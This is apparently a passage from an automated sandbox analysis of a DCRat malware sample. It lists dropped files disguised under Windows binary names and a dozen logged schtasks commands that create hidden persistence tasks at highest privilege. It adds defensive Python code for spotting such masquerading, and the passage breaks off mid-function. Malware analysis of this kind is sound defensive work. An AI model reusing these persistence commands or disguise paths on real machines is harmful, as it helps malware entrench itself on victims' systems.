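The chunk-size line explains why the dump starts with "dfbe" rather than HTML, and the Cyrillic title shows the server was serving the hosting provider's own error page; together with the cp.sprinthost.ru strings in memory this is consistent with the C2 account having been suspended by the hoster at analysis time, so no real tasking was observed. The URL triage isolates what is worth hunting for on a network: an auto-generated shared-hosting subdomain, a short hex-named PHP script, and query parameter names that are not words.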

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Code function: 0_2_00007FF848F33565 0_2_00007FF848F33565
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Code function: 0_2_00007FF848F39FB5 0_2_00007FF848F39FB5
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F0B08D 20_2_00007FF848F0B08D
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F03354 20_2_00007FF848F03354
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F0A29C 20_2_00007FF848F0A29C
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F02C10 20_2_00007FF848F02C10
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F02C10 20_2_00007FF848F02C10
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F0B04D 20_2_00007FF848F0B04D
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F0B0A5 20_2_00007FF848F0B0A5
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F02C10 20_2_00007FF848F02C10
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F09FB5 20_2_00007FF848F09FB5
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 22_2_00007FF848F13565 22_2_00007FF848F13565
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 22_2_00007FF848F19FB5 22_2_00007FF848F19FB5
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Code function: 25_2_00007FF848F13565 25_2_00007FF848F13565
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Code function: 25_2_00007FF848F19FB5 25_2_00007FF848F19FB5
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Code function: 27_2_00007FF848F43565 27_2_00007FF848F43565
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Code function: 27_2_00007FF848F49FB5 27_2_00007FF848F49FB5
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 28_2_00007FF848F23565 28_2_00007FF848F23565
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 28_2_00007FF848F29FB5 28_2_00007FF848F29FB5
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Code function: 29_2_00007FF848F33565 29_2_00007FF848F33565
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Code function: 29_2_00007FF848F39FB5 29_2_00007FF848F39FB5
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Code function: 30_2_00007FF848F29FB5 30_2_00007FF848F29FB5
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Code function: 30_2_00007FF848F23565 30_2_00007FF848F23565
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 31_2_00007FF848F49FB5 31_2_00007FF848F49FB5
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 31_2_00007FF848F43565 31_2_00007FF848F43565
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 32_2_00007FF848F33565 32_2_00007FF848F33565
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 32_2_00007FF848F39FB5 32_2_00007FF848F39FB5
Source: C:\Recovery\System.exe Code function: 33_2_00007FF848F13565 33_2_00007FF848F13565
Source: C:\Recovery\System.exe Code function: 33_2_00007FF848F19FB5 33_2_00007FF848F19FB5
Source: C:\Recovery\System.exe Code function: 34_2_00007FF848F19FB5 34_2_00007FF848F19FB5
Source: C:\Recovery\System.exe Code function: 34_2_00007FF848F13565 34_2_00007FF848F13565
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F1512D 37_2_00007FF848F1512D
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F17057 37_2_00007FF848F17057
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F14B59 37_2_00007FF848F14B59
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F161E1 37_2_00007FF848F161E1
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F126D8 37_2_00007FF848F126D8
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F12179 37_2_00007FF848F12179
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F03565 37_2_00007FF848F03565
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F09FB5 37_2_00007FF848F09FB5
Source: C:\Recovery\System.exe Code function: 38_2_00007FF848F29FB5 38_2_00007FF848F29FB5
Source: C:\Recovery\System.exe Code function: 38_2_00007FF848F23565 38_2_00007FF848F23565
Source: 4KjLUaW30K.exe Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: mnUYCZffXdEgQlZPiczLektp.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: mnUYCZffXdEgQlZPiczLektp.exe0.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ShellExperienceHost.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: dllhost.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 4KjLUaW30K.exe, 00000000.00000000.2028330302.0000000000674000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMiscInfoGrabber.dclib4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename( vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2102472012.000000001B9A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074623783.00000000029B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMiscInfoGrabber.dclib4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074873324.00000000029D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename( vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2086148884.0000000012C22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename$ vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2072779086.0000000000F70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDisableUAC.dclib4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2104376642.000000001BDA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074339378.0000000002990000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename( vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074823760.00000000029C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2073930444.0000000002970000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename$ vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDisableUAC.dclib4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002B14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename( vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4KjLUaW30K.exe
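The OriginalFilename strings above are the cheapest static tell for a renamed or masquerading binary: the version resource of the dropped copies still names libGLESv2.dll (and the embedded DCRat plugin assemblies MiscInfoGrabber.dclib and DisableUAC.dclib) while the files on disk are called ShellExperienceHost.exe, dllhost.exe, audiodg.exe and System.exe. The Python below is an added example, not part of this report and not Joe Sandbox tooling: it locates VS_VERSIONINFO String blocks by their UTF-16 key and honours the block's wValueLength instead of scanning for printable runs. The stray trailing characters in the report's strings ("libGLESv2.dll4", "OriginalFilename(", "OriginalFilename$") are almost certainly the low byte of the next block's wLength, which a raw string scan glues onto the value; a parser that respects the block length does not pick them up. The sample blobs are constructed inline with a tiny builder and are not bytes from 4KjLUaW30K.exe.

```python
import struct
import sys
from pathlib import PureWindowsPath

# szKey of the VS_VERSIONINFO String block we care about, UTF-16LE plus its NUL terminator
_KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"


def extract_original_filenames(data: bytes) -> list[str]:
    """Return every non-empty OriginalFilename value carried by String blocks in `data`.

    String block layout: WORD wLength, WORD wValueLength (in WCHARs for text), WORD wType,
    WCHAR szKey[] (NUL-terminated), padding to a DWORD boundary, WCHAR Value[].
    """
    names: list[str] = []
    pos = data.find(_KEY)
    while pos != -1:
        hdr = pos - 6                                   # the three WORD header precedes szKey
        if hdr >= 0:
            w_length, w_value_len, w_type = struct.unpack_from("<HHH", data, hdr)
            val_off = pos + len(_KEY)
            val_off += (-(val_off - hdr)) % 4           # Value is DWORD-aligned within the block
            end = val_off + 2 * w_value_len
            # wType 1 == text; a zero wValueLength is an empty value, not the next block's bytes
            if w_type == 1 and w_value_len and end <= min(len(data), hdr + w_length):
                name = data[val_off:end].decode("utf-16-le", "replace").rstrip("\x00")
                if name:
                    names.append(name)
        pos = data.find(_KEY, pos + 1)
    return names


def original_filename_mismatch(data: bytes, on_disk_name: str) -> list[str]:
    """Names the version resource claims that differ (case-insensitively) from the real file name."""
    return [n for n in extract_original_filenames(data) if n.casefold() != on_disk_name.casefold()]


# --- constructed test data (assumption: not bytes from the analysed sample) ---------------------
def _vs_string(key: str, value: str) -> bytes:
    """Build one String block exactly as the layout above describes it."""
    body = key.encode("utf-16-le") + b"\x00\x00"
    if (6 + len(body)) % 4:
        body += b"\x00\x00"
    w_value_len = 0
    if value:
        body += value.encode("utf-16-le") + b"\x00\x00"
        w_value_len = len(value) + 1
    return struct.pack("<HHH", 6 + len(body), w_value_len, 1) + body


_PREFIX = b"MZ" + bytes(62)                              # stand-in for the rest of a PE image
SAMPLE_MASQUERADE = (_PREFIX + _vs_string("CompanyName", "Example")
                     + _vs_string("OriginalFilename", "libGLESv2.dll")
                     # next block's wLength is 0x34 == '4': a raw scan reports "libGLESv2.dll4"
                     + _vs_string("ProductName", "Something"))
SAMPLE_HONEST = _PREFIX + _vs_string("OriginalFilename", "audiodg.exe")
SAMPLE_EMPTY = (_PREFIX + _vs_string("OriginalFilename", "")   # empty value followed by another block
                + _vs_string("ProductName", "Something"))


if __name__ == "__main__":
    # usage: python this.py <file.exe> ...   prints the claimed names that disagree with the file name
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, original_filename_mismatch(fh.read(), PureWindowsPath(path).name))
```

Run it over the dropped copies in C:\Users\Public\Downloads, C:\Recovery and the two Program Files (x86) subfolders named in this report; a non-empty result for a file that carries a Windows binary's name is worth an alert on its own, before any dynamic analysis.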
Source: 4KjLUaW30K.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 4KjLUaW30K.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mnUYCZffXdEgQlZPiczLektp.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mnUYCZffXdEgQlZPiczLektp.exe0.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ShellExperienceHost.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dllhost.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4KjLUaW30K.exe, QYy0Hs0Ej6oohN07xsf.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4KjLUaW30K.exe, QYy0Hs0Ej6oohN07xsf.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4KjLUaW30K.exe, DBx1HnV2WnrVt2OJGyF.cs Cryptographic APIs: 'TransformBlock'
Source: 4KjLUaW30K.exe, DBx1HnV2WnrVt2OJGyF.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.evad.winEXE@33/31@1/1
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe
Source: C:\Recovery\System.exe Mutant created: NULL
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\d945671f81d9dd580b9f4721388aab3966aadb2c
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"
Source: 4KjLUaW30K.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4KjLUaW30K.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 4KjLUaW30K.exe ReversingLabs: Detection: 83%
Source: 4KjLUaW30K.exe Virustotal: Detection: 68%
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File read: C:\Users\user\Desktop\4KjLUaW30K.exe
Source: unknown Process created: C:\Users\user\Desktop\4KjLUaW30K.exe "C:\Users\user\Desktop\4KjLUaW30K.exe"
Source: unknown Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Recovery\System.exe'" /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\System.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\System.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektp" /sc ONLOGON /tr "'C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /rl HIGHEST /f
Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektp" /sc ONLOGON /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Source: unknown Process created: C:\Program Files (x86)\Windows Defender\dllhost.exe "C:\Program Files (x86)\windows defender\dllhost.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 6 /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Source: unknown Process created: C:\Program Files (x86)\Windows Defender\dllhost.exe "C:\Program Files (x86)\windows defender\dllhost.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Source: unknown Process created: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe
Source: unknown Process created: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe
Source: unknown Process created: C:\Users\Public\Downloads\ShellExperienceHost.exe C:\Users\Public\Downloads\ShellExperienceHost.exe
Source: unknown Process created: C:\Users\Public\Downloads\ShellExperienceHost.exe C:\Users\Public\Downloads\ShellExperienceHost.exe
Source: unknown Process created: C:\Recovery\System.exe C:\Recovery\System.exe
Source: unknown Process created: C:\Recovery\System.exe C:\Recovery\System.exe
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Source: unknown Process created: C:\Recovery\System.exe "C:\Recovery\System.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
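The twelve schtasks /create lines above show the persistence scheme in full: a pair of tasks per dropped copy (an ONLOGON trigger plus a MINUTE trigger of 5 to 14 minutes), /rl HIGHEST on most of them, task names that mirror the target file name with at most one extra letter, and targets that borrow the names of real Windows binaries (audiodg.exe, dllhost.exe, ShellExperienceHost.exe) while sitting in logs, Temp, Public, Default-profile and C:\Recovery directories. The Python below is an added example for triaging such command lines from a process-creation log; it is not Joe Sandbox code and not one of the Sigma rules listed in this report. The expected home directories for the borrowed binary names and the list of suspicious roots are my assumptions; the four sample command lines are copied from the report, and the fifth is a constructed benign task for contrast.

```python
import re
from pathlib import PureWindowsPath
from typing import Optional

# schtasks switches that consume the following token; everything else (/create, /f, ...) is a bare flag
VALUE_SWITCHES = {"tn", "sc", "mo", "tr", "rl", "st", "sd", "ed", "ri", "du", "ru", "rp", "s", "u", "p", "xml"}

# Assumed: where the genuine file of each borrowed name lives; () means Windows ships no such file
SYSTEM_BINARY_HOMES = {
    "audiodg.exe": (r"c:\windows\system32",),
    "dllhost.exe": (r"c:\windows\system32", r"c:\windows\syswow64"),
    "shellexperiencehost.exe": (r"c:\windows\systemapps",),   # ShellExperienceHost_cw5n1h2txyewy\ below it
    "system.exe": (),
}
# Assumed: roots any user can write to, or that hold no executables in a healthy install
SUSPICIOUS_ROOTS = (r"c:\users\public", r"c:\users\default", r"c:\users\all users",
                    r"c:\programdata", r"c:\recovery")
SUSPICIOUS_DIRS = {"logs", "temp", "tmp"}


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping double-quoted runs together."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_schtasks_create(cmdline: str) -> Optional[dict]:
    """Return the switches of a `schtasks /create` command line, or None if it is not one."""
    toks, opts, i = tokenize(cmdline), {}, 0
    while i < len(toks):
        if toks[i].startswith("/"):
            key = toks[i][1:].lower()
            if key in VALUE_SWITCHES and i + 1 < len(toks):
                opts[key] = toks[i + 1]
                i += 1
            else:
                opts[key] = True
        i += 1
    if "create" not in opts or "tr" not in opts:
        return None
    opts["tr"] = str(opts["tr"]).strip("'\"")        # the sample wraps the target as "'C:\...'"
    return opts


def assess_path(path: str) -> list[str]:
    """Reasons an executable path looks like masquerading or staging; empty if it looks normal."""
    p = PureWindowsPath(path)
    low, name, parent = str(p).lower(), p.name.lower(), str(p.parent).lower()
    reasons = []
    if name in SYSTEM_BINARY_HOMES:
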